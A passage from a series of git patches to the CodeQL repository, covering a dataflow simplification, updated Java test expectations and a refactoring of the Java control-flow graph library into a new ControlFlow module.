count(FlowState state | fwdFlow(_, state, _, _, _, _, _)) and tuples = count(NodeEx n, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, - TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, _, stored)) and + TypOption stored | fwdFlow(n, state, cc, summaryCtx, t, ap, stored)) and calledges = count(DataFlowCall call, DataFlowCallable c | FwdTypeFlowInput::dataFlowTakenCallEdgeIn(call, c, _) or From 40f77136787ab75491b604b9e6a7bfaa2b1f6f00 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 13:28:43 +0100 Subject: [PATCH 0980/1267] Dataflow: Minor simplification. --- shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 56bf5530704..6ead5b71906 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -2043,7 +2043,7 @@ module MakeImpl Lang> { exists(NodeEx node, FlowState state | sourceNode(node, state) and (if hasSourceCallCtx() then cc = true else cc = false) and - PrevStage::revFlow(node, state, getApprox(any(ApNil nil))) and + PrevStage::revFlow(node, state, any(PrevStage::ApNil nil)) and c = node.getEnclosingCallable() ) or From da179705c393598d6c15d57b5a266b397e3232ac Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Tue, 10 Dec 2024 14:52:06 +0100 Subject: [PATCH 0981/1267] Java: Accept expected file changes. --- .../test/library-tests/dataflow/capture/inlinetest.expected | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected index d127b92ddaf..a336577503f 100644 --- a/java/ql/test/library-tests/dataflow/capture/inlinetest.expected +++ b/java/ql/test/library-tests/dataflow/capture/inlinetest.expected @@ -171,10 +171,12 @@ edges | B.java:154:17:154:28 | source(...) : String | B.java:175:5:175:6 | String s2 : String | provenance | | | B.java:158:7:158:13 | parameter this : MyLocal [String s1] : String | B.java:159:18:159:19 | this : MyLocal [String s1] : String | provenance | | | B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | B.java:160:14:160:15 | this : MyLocal [String s2] : String | provenance | | +| B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | B.java:160:14:160:15 | this : MyLocal [String s2] : String | provenance | | | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | B.java:158:7:158:13 | parameter this [Return] : MyLocal [f] : String | provenance | | | B.java:159:18:159:19 | s1 : String | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | provenance | | | B.java:159:18:159:19 | this : MyLocal [String s1] : String | B.java:159:18:159:19 | s1 : String | provenance | | | B.java:160:14:160:15 | this : MyLocal [String s2] : String | B.java:160:14:160:15 | s2 | provenance | | +| B.java:160:14:160:15 | this : MyLocal [String s2] : String | B.java:160:14:160:15 | s2 | provenance | | | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | B.java:164:14:164:15 | this : MyLocal [String s2] : String | provenance | | | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | B.java:163:14:163:14 | this <.field> : MyLocal [f] : String | provenance | | | B.java:163:14:163:14 | this <.field> : MyLocal [f] : String | B.java:163:14:163:14 | f | provenance | | @@ -464,12 +466,14 @@ nodes | B.java:154:17:154:28 | source(...) : String | semmle.label | source(...) : String | | B.java:158:7:158:13 | parameter this : MyLocal [String s1] : String | semmle.label | parameter this : MyLocal [String s1] : String | | B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | +| B.java:158:7:158:13 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | | B.java:158:7:158:13 | parameter this [Return] : MyLocal [f] : String | semmle.label | parameter this [Return] : MyLocal [f] : String | | B.java:159:9:159:12 | this [post update] : MyLocal [f] : String | semmle.label | this [post update] : MyLocal [f] : String | | B.java:159:18:159:19 | s1 : String | semmle.label | s1 : String | | B.java:159:18:159:19 | this : MyLocal [String s1] : String | semmle.label | this : MyLocal [String s1] : String | | B.java:160:14:160:15 | s2 | semmle.label | s2 | | B.java:160:14:160:15 | this : MyLocal [String s2] : String | semmle.label | this : MyLocal [String s2] : String | +| B.java:160:14:160:15 | this : MyLocal [String s2] : String | semmle.label | this : MyLocal [String s2] : String | | B.java:162:12:162:15 | parameter this : MyLocal [String s2] : String | semmle.label | parameter this : MyLocal [String s2] : String | | B.java:162:12:162:15 | parameter this : MyLocal [f] : String | semmle.label | parameter this : MyLocal [f] : String | | B.java:163:14:163:14 | f | semmle.label | f | From 0f3dd6d8f112484556e4ce15c0da5c72bce1696b Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Tue, 12 Nov 2024 17:01:51 +0000 Subject: [PATCH 0982/1267] Java: IPA the CFG --- java/ql/consistency-queries/cfgDeadEnds.ql | 14 +- .../lib/semmle/code/java/ControlFlowGraph.qll | 311 +++++++++++------- java/ql/lib/semmle/code/java/Expr.qll | 4 +- java/ql/lib/semmle/code/java/Statement.qll | 4 +- .../code/java/controlflow/BasicBlocks.qll | 5 + .../code/java/controlflow/Dominance.qll | 21 +- .../semmle/code/java/controlflow/Guards.qll | 6 +- .../semmle/code/java/controlflow/Paths.qll | 14 +- .../java/controlflow/UnreachableBlocks.qll | 12 +- .../code/java/dataflow/InstanceAccess.qll | 8 +- .../semmle/code/java/dataflow/Nullness.qll | 24 +- .../code/java/dataflow/RangeAnalysis.qll | 6 +- java/ql/lib/semmle/code/java/dataflow/SSA.qll | 35 +- .../semmle/code/java/dataflow/TypeFlow.qll | 4 +- .../code/java/dataflow/internal/BaseSSA.qll | 19 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- .../java/dataflow/internal/DataFlowUtil.qll | 6 +- .../rangeanalysis/ModulusAnalysisSpecific.qll | 2 +- .../rangeanalysis/SignAnalysisSpecific.qll | 2 +- .../rangeanalysis/SsaReadPositionSpecific.qll | 6 +- .../code/java/frameworks/Assertions.qll | 8 +- .../code/java/metrics/MetricCallable.qll | 6 +- .../code/java/security/PathSanitizer.qll | 10 +- .../semmle/code/java/security/Validation.qll | 2 +- .../Comparison/UselessComparisonTest.qll | 2 +- .../DoubleCheckedLockingWithInitRace.ql | 2 +- .../Concurrency/LazyInitStaticField.ql | 4 +- .../Likely Bugs/Concurrency/UnreleasedLock.ql | 14 +- .../Termination/ConstantLoopCondition.ql | 4 +- .../CWE/CWE-833/LockOrderInconsistency.ql | 4 +- .../Declarations/BreakInSwitchCase.ql | 2 +- .../Declarations/Common.qll | 6 +- .../CWE/CWE-094/SpringViewManipulationLib.qll | 2 +- .../controlflow/basic/bbStmts.expected | 4 +- .../controlflow/basic/bbStmts.ql | 2 +- .../basic/bbStrictDominance.expected | 4 +- .../controlflow/basic/bbSuccessor.expected | 4 +- .../controlflow/basic/strictDominance.ql | 2 +- .../controlflow/basic/strictPostDominance.ql | 2 +- .../controlflow/dominance/dominanceBad.ql | 4 +- .../controlflow/dominance/dominanceWrong.ql | 2 +- .../controlflow/dominance/dominatedByStart.ql | 6 +- .../controlflow/dominance/dominator.expected | 4 +- .../controlflow/dominance/dominatorExists.ql | 4 +- .../library-tests/controlflow/paths/paths.ql | 2 +- .../MultiCatch/MultiCatchControlFlow.expected | 10 +- .../pattern-instanceof/cfg.expected | 14 +- .../library-tests/pattern-instanceof/cfg.ql | 2 +- .../pattern-switch/cfg/test.expected | 22 +- .../library-tests/pattern-switch/cfg/test.ql | 2 +- .../CloseReaderTest/TestSucc.expected | 6 +- .../successors/CloseReaderTest/TestSucc.ql | 2 +- .../LoopVarReadTest/TestSucc.expected | 4 +- .../successors/LoopVarReadTest/TestSucc.ql | 2 +- .../successors/SaveFileTest/TestSucc.expected | 6 +- .../successors/SaveFileTest/TestSucc.ql | 2 +- .../successors/SchackTest/TestSucc.expected | 12 +- .../successors/SchackTest/TestSucc.ql | 2 +- .../successors/TestBreak/TestSucc.expected | 8 +- .../successors/TestBreak/TestSucc.ql | 2 +- .../TestContinue/FalseSuccessors.expected | 2 +- .../successors/TestContinue/TestSucc.expected | 6 +- .../successors/TestContinue/TestSucc.ql | 2 +- .../TestDeclarations/TestSucc.expected | 6 +- .../successors/TestDeclarations/TestSucc.ql | 2 +- .../successors/TestFinally/TestSucc.expected | 10 +- .../successors/TestFinally/TestSucc.ql | 2 +- .../TestSucc.expected | 6 +- .../TestFinallyBreakContinue/TestSucc.ql | 2 +- .../TestLoopBranch/TestSucc.expected | 14 +- .../successors/TestLoopBranch/TestSucc.ql | 2 +- .../successors/TestThrow/TestSucc.expected | 18 +- .../successors/TestThrow/TestSucc.ql | 2 +- .../successors/TestThrow2/TestSucc.expected | 6 +- .../successors/TestThrow2/TestSucc.ql | 2 +- .../successors/TestTryCatch/TestSucc.expected | 6 +- .../successors/TestTryCatch/TestSucc.ql | 2 +- .../TestTryWithResources/TestSucc.expected | 4 +- .../TestTryWithResources/TestSucc.ql | 2 +- 79 files changed, 455 insertions(+), 348 deletions(-) diff --git a/java/ql/consistency-queries/cfgDeadEnds.ql b/java/ql/consistency-queries/cfgDeadEnds.ql index 73c30015a6f..817d8e858c6 100644 --- a/java/ql/consistency-queries/cfgDeadEnds.ql +++ b/java/ql/consistency-queries/cfgDeadEnds.ql @@ -1,7 +1,6 @@ import java -import semmle.code.java.ControlFlowGraph -predicate shouldBeDeadEnd(ControlFlowNode n) { +predicate shouldBeDeadEnd(ExprParent n) { n instanceof BreakStmt and n.getFile().isKotlinSourceFile() // TODO or n instanceof Interface // TODO @@ -55,8 +54,11 @@ predicate shouldBeDeadEnd(ControlFlowNode n) { n = any(ConstCase c).getValue(_) // TODO } -from ControlFlowNode n, string s +from ControlFlowNode n, ExprParent astnode, string s where - // TODO: exists(n.getASuccessor()) and shouldBeDeadEnd(n) and s = "expected dead end" - not exists(n.getASuccessor()) and not shouldBeDeadEnd(n) and s = "unexpected dead end" -select n, n.getPrimaryQlClasses(), s + astnode = n.getAstNode() and + // TODO: exists(n.getASuccessor()) and shouldBeDeadEnd(n.getAstNode()) and s = "expected dead end" + not exists(n.getASuccessor()) and + not shouldBeDeadEnd(astnode) and + s = "unexpected dead end" +select n, astnode.getPrimaryQlClasses(), s diff --git a/java/ql/lib/semmle/code/java/ControlFlowGraph.qll b/java/ql/lib/semmle/code/java/ControlFlowGraph.qll index f8e94dc7684..26fae3c4108 100644 --- a/java/ql/lib/semmle/code/java/ControlFlowGraph.qll +++ b/java/ql/lib/semmle/code/java/ControlFlowGraph.qll @@ -4,7 +4,7 @@ * The only API exported by this library are the toplevel classes `ControlFlowNode` * and its subclass `ConditionNode`, which wrap the successor relation and the * concept of true- and false-successors of conditions. A cfg node may either be a - * statement, an expression, or the enclosing callable, indicating that + * statement, an expression, or an exit node for a callable, indicating that * execution of the callable terminates. */ @@ -84,45 +84,122 @@ private import Completion private import controlflow.internal.Preconditions private import controlflow.internal.SwitchCases -/** A node in the expression-level control-flow graph. */ -class ControlFlowNode extends Top, @exprparent { - /** Gets the statement containing this node, if any. */ - Stmt getEnclosingStmt() { - result = this or - result = this.(Expr).getEnclosingStmt() +/** Provides the definition of control flow nodes. */ +module ControlFlow { + private predicate hasControlFlow(Expr e) { + not exists(ConstCase cc | e = cc.getValue(_)) and + not e.getParent*() instanceof Annotation and + not e instanceof TypeAccess and + not e instanceof ArrayTypeAccess and + not e instanceof UnionTypeAccess and + not e instanceof IntersectionTypeAccess and + not e instanceof WildcardTypeAccess and + not exists(AssignExpr ae | ae.getDest() = e) } - /** Gets the immediately enclosing callable whose body contains this node. */ - Callable getEnclosingCallable() { - result = this or - result = this.(Stmt).getEnclosingCallable() or - result = this.(Expr).getEnclosingCallable() + private newtype TNode = + TExprNode(Expr e) { hasControlFlow(e) } or + TStmtNode(Stmt s) or + TExitNode(Callable c) { exists(c.getBody()) } + + /** A node in the expression-level control-flow graph. */ + class Node extends TNode { + /** Gets the statement containing this node, if any. */ + Stmt getEnclosingStmt() { + result = this.asStmt() or + result = this.asExpr().getEnclosingStmt() + } + + /** Gets the immediately enclosing callable whose body contains this node. */ + Callable getEnclosingCallable() { + this = TExitNode(result) or + result = this.asStmt().getEnclosingCallable() or + result = this.asExpr().getEnclosingCallable() + } + + /** Gets the statement this `Node` corresponds to, if any. */ + Stmt asStmt() { this = TStmtNode(result) } + + /** Gets the expression this `Node` corresponds to, if any. */ + Expr asExpr() { this = TExprNode(result) } + + /** Gets the call this `Node` corresponds to, if any. */ + Call asCall() { + result = this.asExpr() or + result = this.asStmt() + } + + /** Gets an immediate successor of this node. */ + Node getASuccessor() { result = succ(this) } + + /** Gets an immediate predecessor of this node. */ + Node getAPredecessor() { this = succ(result) } + + /** Gets an exception successor of this node. */ + Node getAnExceptionSuccessor() { result = succ(this, ThrowCompletion(_)) } + + /** Gets a successor of this node that is neither an exception successor nor a jump (break, continue, return). */ + Node getANormalSuccessor() { + result = succ(this, BooleanCompletion(_, _)) or + result = succ(this, NormalCompletion()) + } + + /** Gets the basic block that contains this node. */ + BasicBlock getBasicBlock() { result.getANode() = this } + + /** Gets a textual representation of this element. */ + string toString() { + result = this.asExpr().toString() + or + result = this.asStmt().toString() + or + result = "Exit" and this instanceof ExitNode + } + + /** Gets the source location for this element. */ + Location getLocation() { + result = this.asExpr().getLocation() or + result = this.asStmt().getLocation() or + result = this.(ExitNode).getEnclosingCallable().getLocation() + } + + /** + * Get the most appropriate AST node for this control flow node, if any. + * + * This is needed for the equivalence relation on basic blocks in range + * analysis. + */ + ExprParent getAstNode() { + result = this.asExpr() or + result = this.asStmt() or + this = TExitNode(result) + } } - /** Gets an immediate successor of this node. */ - ControlFlowNode getASuccessor() { result = succ(this) } - - /** Gets an immediate predecessor of this node. */ - ControlFlowNode getAPredecessor() { this = succ(result) } - - /** Gets an exception successor of this node. */ - ControlFlowNode getAnExceptionSuccessor() { result = succ(this, ThrowCompletion(_)) } - - /** Gets a successor of this node that is neither an exception successor nor a jump (break, continue, return). */ - ControlFlowNode getANormalSuccessor() { - result = succ(this, BooleanCompletion(_, _)) or - result = succ(this, NormalCompletion()) - } - - /** Gets the basic block that contains this node. */ - BasicBlock getBasicBlock() { result.getANode() = this } + /** A synthetic node for the exit of a callable. */ + class ExitNode extends Node, TExitNode { } } +class ControlFlowNode = ControlFlow::Node; + /** Gets the intra-procedural successor of `n`. */ private ControlFlowNode succ(ControlFlowNode n) { result = succ(n, _) } cached private module ControlFlowGraphImpl { + private import ControlFlow + + private class AstNode extends ExprParent { + AstNode() { this instanceof Expr or this instanceof Stmt } + + Stmt getEnclosingStmt() { + result = this or + result = this.(Expr).getEnclosingStmt() + } + + Node getCFGNode() { result.asExpr() = this or result.asStmt() = this } + } + /** * Gets a label that applies to this statement. */ @@ -167,7 +244,7 @@ private module ControlFlowGraphImpl { * `ClassCastException` is expected, or because it is a Kotlin not-null check * and a `NullPointerException` is expected. */ - private predicate mayThrow(ControlFlowNode n, ThrowableType t) { + private predicate mayThrow(AstNode n, ThrowableType t) { t = n.(ThrowStmt).getThrownExceptionType() or exists(Call c | c = n | @@ -200,7 +277,7 @@ private module ControlFlowGraphImpl { * Bind `t` to an unchecked exception that may transfer control to a finally * block inside which `n` is nested. */ - private predicate uncheckedExceptionFromFinally(ControlFlowNode n, ThrowableType t) { + private predicate uncheckedExceptionFromFinally(AstNode n, ThrowableType t) { exists(TryStmt try | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() @@ -214,7 +291,7 @@ private module ControlFlowGraphImpl { * Bind `t` to all unchecked exceptions that may be caught by some * `try-catch` inside which `n` is nested. */ - private predicate uncheckedExceptionFromCatch(ControlFlowNode n, ThrowableType t) { + private predicate uncheckedExceptionFromCatch(AstNode n, ThrowableType t) { exists(TryStmt try, UncheckedThrowableSuperType caught | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() @@ -229,7 +306,7 @@ private module ControlFlowGraphImpl { * body or the resources (if any) of `try`. */ private ThrowableType thrownInBody(TryStmt try) { - exists(ControlFlowNode n | mayThrow(n, result) | + exists(AstNode n | mayThrow(n, result) | n.getEnclosingStmt().getEnclosingStmt+() = try.getBlock() or n.(Expr).getParent*() = try.getAResource() ) @@ -287,7 +364,7 @@ private module ControlFlowGraphImpl { * That is, contexts where the control-flow edges depend on `value` given that `b` ends * with a `booleanCompletion(value, _)`. */ - private predicate inBooleanContext(ControlFlowNode b) { + private predicate inBooleanContext(AstNode b) { exists(LogicExpr logexpr | logexpr.(BinaryExpr).getLeftOperand() = b or @@ -493,9 +570,7 @@ private module ControlFlowGraphImpl { * immediately before either falling through to execute successor statements or execute a rule body * if present. `completion` is the completion kind of the last operation. */ - private predicate lastPatternCaseMatchingOp( - PatternCase pc, ControlFlowNode last, Completion completion - ) { + private predicate lastPatternCaseMatchingOp(PatternCase pc, Node last, Completion completion) { last(pc.getAPattern(), last, completion) and completion = NormalCompletion() and not exists(pc.getGuard()) @@ -514,7 +589,7 @@ private module ControlFlowGraphImpl { * and `ThrowStmt`. CFG nodes without child nodes in the CFG that may complete * normally are also included. */ - private class PostOrderNode extends ControlFlowNode { + private class PostOrderNode extends AstNode { PostOrderNode() { // For VarAccess and ArrayAccess only read accesses (r-values) are included, // as write accesses aren't included in the CFG. @@ -576,7 +651,7 @@ private module ControlFlowGraphImpl { } /** Gets child nodes in their order of execution. Indexing starts at either -1 or 0. */ - ControlFlowNode getChildNode(int index) { + AstNode getChildNode(int index) { exists(ArrayAccess e | e = this | index = 0 and result = e.getArray() or @@ -649,7 +724,7 @@ private module ControlFlowGraphImpl { } /** Gets the first child node, if any. */ - ControlFlowNode firstChild() { + AstNode firstChild() { result = this.getChildNode(-1) or result = this.getChildNode(0) and not exists(this.getChildNode(-1)) @@ -687,18 +762,18 @@ private module ControlFlowGraphImpl { /** * Determine the part of the AST node `n` that will be executed first. */ - private ControlFlowNode first(ControlFlowNode n) { - result = n and n instanceof LogicExpr + private Node first(AstNode n) { + result.asExpr() = n and n instanceof LogicExpr or - result = n and n instanceof ConditionalExpr + result.asExpr() = n and n instanceof ConditionalExpr or - result = n and n instanceof WhenExpr + result.asExpr() = n and n instanceof WhenExpr or - result = n and n instanceof WhenBranch + result.asStmt() = n and n instanceof WhenBranch or - result = n and n instanceof StmtExpr + result.asExpr() = n and n instanceof StmtExpr or - result = n and n.(PostOrderNode).isLeafNode() + result = n.getCFGNode() and n.(PostOrderNode).isLeafNode() or result = first(n.(PostOrderNode).firstChild()) or @@ -706,12 +781,11 @@ private module ControlFlowGraphImpl { or result = first(n.(SynchronizedStmt).getExpr()) or - result = n and - n instanceof Stmt and + result.asStmt() = n and not n instanceof PostOrderNode and not n instanceof SynchronizedStmt or - result = n and n instanceof SwitchExpr + result.asExpr() = n and n instanceof SwitchExpr } /** @@ -722,9 +796,7 @@ private module ControlFlowGraphImpl { * node in the `try` block that may not complete normally, or a node in * the `try` block that has no control flow successors inside the block. */ - private predicate catchOrFinallyCompletion( - TryStmt try, ControlFlowNode last, Completion completion - ) { + private predicate catchOrFinallyCompletion(TryStmt try, Node last, Completion completion) { last(try.getBlock(), last, completion) or last(try.getAResource(), last, completion) and completion = ThrowCompletion(_) @@ -737,7 +809,7 @@ private module ControlFlowGraphImpl { * In other words, if `last` throws an exception it is possibly not caught by any * of the catch clauses. */ - private predicate uncaught(TryStmt try, ControlFlowNode last, Completion completion) { + private predicate uncaught(TryStmt try, Node last, Completion completion) { catchOrFinallyCompletion(try, last, completion) and ( exists(ThrowableType thrown | @@ -767,12 +839,12 @@ private module ControlFlowGraphImpl { * This is similar to `uncaught`, but also includes final statements of `catch` * clauses. */ - private predicate finallyPred(TryStmt try, ControlFlowNode last, Completion completion) { + private predicate finallyPred(TryStmt try, Node last, Completion completion) { uncaught(try, last, completion) or last(try.getACatchClause(), last, completion) } - private predicate lastInFinally(TryStmt try, ControlFlowNode last) { + private predicate lastInFinally(TryStmt try, Node last) { last(try.getFinally(), last, NormalCompletion()) } @@ -796,7 +868,7 @@ private module ControlFlowGraphImpl { * A `booleanCompletion` implies that `n` is an `Expr`. Any abnormal * completion besides `throwCompletion` implies that `n` is a `Stmt`. */ - private predicate last(ControlFlowNode n, ControlFlowNode last, Completion completion) { + private predicate last(AstNode n, Node last, Completion completion) { // Exceptions are propagated from any sub-expression. // As are any break, yield, continue, or return completions. exists(Expr e | e.getParent() = n | @@ -853,15 +925,18 @@ private module ControlFlowGraphImpl { ) or exists(InstanceOfExpr ioe | ioe.isPattern() and ioe = n | - last = n and completion = basicBooleanCompletion(false) + last.asExpr() = n and completion = basicBooleanCompletion(false) or last(ioe.getPattern(), last, NormalCompletion()) and completion = basicBooleanCompletion(true) ) or // The last node of a node executed in post-order is the node itself. - n.(PostOrderNode).mayCompleteNormally() and last = n and completion = NormalCompletion() + // n.(PostOrderNode).mayCompleteNormally() and last = n and completion = NormalCompletion() + exists(PostOrderNode p | p = n | + p.mayCompleteNormally() and last = p.getCFGNode() and completion = NormalCompletion() + ) or - last = n and completion = basicBooleanCompletion(n.(BooleanLiteral).getBooleanValue()) + last.asExpr() = n and completion = basicBooleanCompletion(n.(BooleanLiteral).getBooleanValue()) or // The last statement in a block is any statement that does not complete normally, // or the last statement. @@ -997,7 +1072,7 @@ private module ControlFlowGraphImpl { // * On success of its guard test, if it is not a rule (boolean true) // (the latter two cases are accounted for by lastPatternCaseMatchingOp) exists(PatternCase pc | n = pc | - last = pc and completion = basicBooleanCompletion(false) + last.asStmt() = pc and completion = basicBooleanCompletion(false) or last(pc.getGuard(), last, completion) and completion = BooleanCompletion(false, _) @@ -1010,13 +1085,15 @@ private module ControlFlowGraphImpl { last(n.(SynchronizedStmt).getBlock(), last, completion) or // `return` statements give rise to a `Return` completion - last = n.(ReturnStmt) and completion = ReturnCompletion() + last.asStmt() = n.(ReturnStmt) and completion = ReturnCompletion() or // `throw` statements or throwing calls give rise to ` Throw` completion - exists(ThrowableType tt | mayThrow(n, tt) | last = n and completion = ThrowCompletion(tt)) + exists(ThrowableType tt | mayThrow(n, tt) | + last = n.getCFGNode() and completion = ThrowCompletion(tt) + ) or // `break` statements give rise to a `Break` completion - exists(BreakStmt break | break = n and last = n | + exists(BreakStmt break | break = n and last.asStmt() = n | completion = labelledBreakCompletion(MkLabel(break.getLabel())) or not exists(break.getLabel()) and completion = anonymousBreakCompletion() @@ -1031,7 +1108,7 @@ private module ControlFlowGraphImpl { ) or // `continue` statements give rise to a `Continue` completion - exists(ContinueStmt cont | cont = n and last = n | + exists(ContinueStmt cont | cont = n and last.asStmt() = n | completion = labelledContinueCompletion(MkLabel(cont.getLabel())) or not exists(cont.getLabel()) and completion = anonymousContinueCompletion() @@ -1067,7 +1144,7 @@ private module ControlFlowGraphImpl { // the last node of the condition of the last branch in the absence of an else-branch. exists(WhenExpr whenexpr | whenexpr = n | // If we have no branches then we are the last node - last = n and + last.asExpr() = n and completion = NormalCompletion() and not exists(whenexpr.getBranch(_)) or @@ -1117,17 +1194,19 @@ private module ControlFlowGraphImpl { * execution finishes with the given completion. */ cached - ControlFlowNode succ(ControlFlowNode n, Completion completion) { - // Callables serve as their own exit nodes. - exists(Callable c | last(c.getBody(), n, completion) | result = c) + Node succ(Node n, Completion completion) { + // The successor of a callable is its exit node. + exists(Callable c | last(c.getBody(), n, completion) | + result.(ExitNode).getEnclosingCallable() = c + ) or // Logic expressions and conditional expressions execute in AST pre-order. completion = NormalCompletion() and ( - result = first(n.(AndLogicalExpr).getLeftOperand()) or - result = first(n.(OrLogicalExpr).getLeftOperand()) or - result = first(n.(LogNotExpr).getExpr()) or - result = first(n.(ConditionalExpr).getCondition()) + result = first(n.asExpr().(AndLogicalExpr).getLeftOperand()) or + result = first(n.asExpr().(OrLogicalExpr).getLeftOperand()) or + result = first(n.asExpr().(LogNotExpr).getExpr()) or + result = first(n.asExpr().(ConditionalExpr).getCondition()) ) or // If a logic expression doesn't short-circuit then control flows from its left operand to its right. @@ -1151,9 +1230,11 @@ private module ControlFlowGraphImpl { ) or exists(InstanceOfExpr ioe | ioe.isPattern() | - last(ioe.getExpr(), n, completion) and completion = NormalCompletion() and result = ioe + last(ioe.getExpr(), n, completion) and + completion = NormalCompletion() and + result.asExpr() = ioe or - n = ioe and + n.asExpr() = ioe and result = first(ioe.getPattern()) and completion = basicBooleanCompletion(true) ) @@ -1164,11 +1245,11 @@ private module ControlFlowGraphImpl { | result = first(p.getChildNode(i + 1)) or - not exists(p.getChildNode(i + 1)) and result = p + not exists(p.getChildNode(i + 1)) and result = p.getCFGNode() ) or // Statements within a block execute sequentially. - result = first(n.(BlockStmt).getStmt(0)) and completion = NormalCompletion() + result = first(n.asStmt().(BlockStmt).getStmt(0)) and completion = NormalCompletion() or exists(BlockStmt blk, int i | last(blk.getStmt(i), n, completion) and @@ -1178,7 +1259,7 @@ private module ControlFlowGraphImpl { or // Control flows to the corresponding branch depending on the boolean completion of the condition. exists(IfStmt s | - n = s and result = first(s.getCondition()) and completion = NormalCompletion() + n.asStmt() = s and result = first(s.getCondition()) and completion = NormalCompletion() or last(s.getCondition(), n, completion) and completion = BooleanCompletion(true, _) and @@ -1190,7 +1271,7 @@ private module ControlFlowGraphImpl { ) or // For statements: - exists(ForStmt for, ControlFlowNode condentry | + exists(ForStmt for, Node condentry | // Any part of the control flow that aims for the condition needs to hit either the condition... condentry = first(for.getCondition()) or @@ -1198,10 +1279,10 @@ private module ControlFlowGraphImpl { not exists(for.getCondition()) and condentry = first(for.getStmt()) | // From the entry point, which is the for statement itself, control goes to either the first init expression... - n = for and result = first(for.getInit(0)) and completion = NormalCompletion() + n.asStmt() = for and result = first(for.getInit(0)) and completion = NormalCompletion() or // ...or the condition if the for doesn't include init expressions. - n = for and + n.asStmt() = for and not exists(for.getAnInit()) and result = condentry and completion = NormalCompletion() @@ -1238,27 +1319,29 @@ private module ControlFlowGraphImpl { // Enhanced for statements: exists(EnhancedForStmt for | // First the expression gets evaluated... - n = for and result = first(for.getExpr()) and completion = NormalCompletion() + n.asStmt() = for and result = first(for.getExpr()) and completion = NormalCompletion() or // ...then the variable gets assigned... last(for.getExpr(), n, completion) and completion = NormalCompletion() and - result = for.getVariable() + result.asExpr() = for.getVariable() or // ...and then control goes to the body of the loop. - n = for.getVariable() and result = first(for.getStmt()) and completion = NormalCompletion() + n.asExpr() = for.getVariable() and + result = first(for.getStmt()) and + completion = NormalCompletion() or // Finally, the back edge of the loop goes to reassign the variable. last(for.getStmt(), n, completion) and continues(completion, for) and - result = for.getVariable() + result.asExpr() = for.getVariable() ) or // While loops start at the condition... - result = first(n.(WhileStmt).getCondition()) and completion = NormalCompletion() + result = first(n.asStmt().(WhileStmt).getCondition()) and completion = NormalCompletion() or // ...and do-while loops start at the body. - result = first(n.(DoStmt).getStmt()) and completion = NormalCompletion() + result = first(n.asStmt().(DoStmt).getStmt()) and completion = NormalCompletion() or exists(LoopStmt loop | loop instanceof WhileStmt or loop instanceof DoStmt | // Control goes from the condition via a true-completion to the body... @@ -1282,7 +1365,7 @@ private module ControlFlowGraphImpl { ) or // After the last resource declaration, control transfers to the body. - exists(TryStmt try | n = try and completion = NormalCompletion() | + exists(TryStmt try | n.asStmt() = try and completion = NormalCompletion() | result = first(try.getResource(0)) or not exists(try.getAResource()) and result = first(try.getBlock()) @@ -1310,7 +1393,7 @@ private module ControlFlowGraphImpl { or // Catch clauses first assign their variable and then execute their block exists(CatchClause cc | completion = NormalCompletion() | - n = cc and result = first(cc.getVariable()) + n.asStmt() = cc and result = first(cc.getVariable()) or last(cc.getVariable(), n, completion) and result = first(cc.getBlock()) ) @@ -1321,7 +1404,9 @@ private module ControlFlowGraphImpl { switchExpr = switch.(SwitchStmt).getExpr() or switchExpr = switch.(SwitchExpr).getExpr() | // From the entry point control is transferred first to the expression... - n = switch and result = first(switchExpr) and completion = NormalCompletion() + (n.asStmt() = switch or n.asExpr() = switch) and + result = first(switchExpr) and + completion = NormalCompletion() or // ...and then to any case up to and including the first pattern case, if any. last(switchExpr, n, completion) and @@ -1345,7 +1430,7 @@ private module ControlFlowGraphImpl { or // A pattern case that completes boolean false (type test or guard failure) continues to consider other cases: exists(PatternCase case | completion = BooleanCompletion(false, _) | - last(case, n, completion) and result = getASuccessorSwitchCase(case, switch) + last(case, n, completion) and result.asStmt() = getASuccessorSwitchCase(case, switch) ) ) or @@ -1358,7 +1443,7 @@ private module ControlFlowGraphImpl { // * Variable declarations -normal-> rule execution (when there is no guard) // * Guard success -true-> rule execution exists(PatternCase pc | - n = pc and + n.asStmt() = pc and completion = basicBooleanCompletion(true) and result = first(pc.getAPattern()) or @@ -1375,7 +1460,7 @@ private module ControlFlowGraphImpl { ) or // Non-pattern cases have an internal edge leading to their rule body if any when the case matches. - exists(SwitchCase case | n = case | + exists(SwitchCase case | n.asStmt() = case | not case instanceof PatternCase and completion = NormalCompletion() and ( @@ -1387,32 +1472,32 @@ private module ControlFlowGraphImpl { or // Yield exists(YieldStmt yield | completion = NormalCompletion() | - n = yield and result = first(yield.getValue()) + n.asStmt() = yield and result = first(yield.getValue()) ) or // Synchronized statements execute their expression _before_ synchronization, so the CFG reflects that. exists(SynchronizedStmt synch | completion = NormalCompletion() | - last(synch.getExpr(), n, completion) and result = synch + last(synch.getExpr(), n, completion) and result.asStmt() = synch or - n = synch and result = first(synch.getBlock()) + n.asStmt() = synch and result = first(synch.getBlock()) ) or - result = 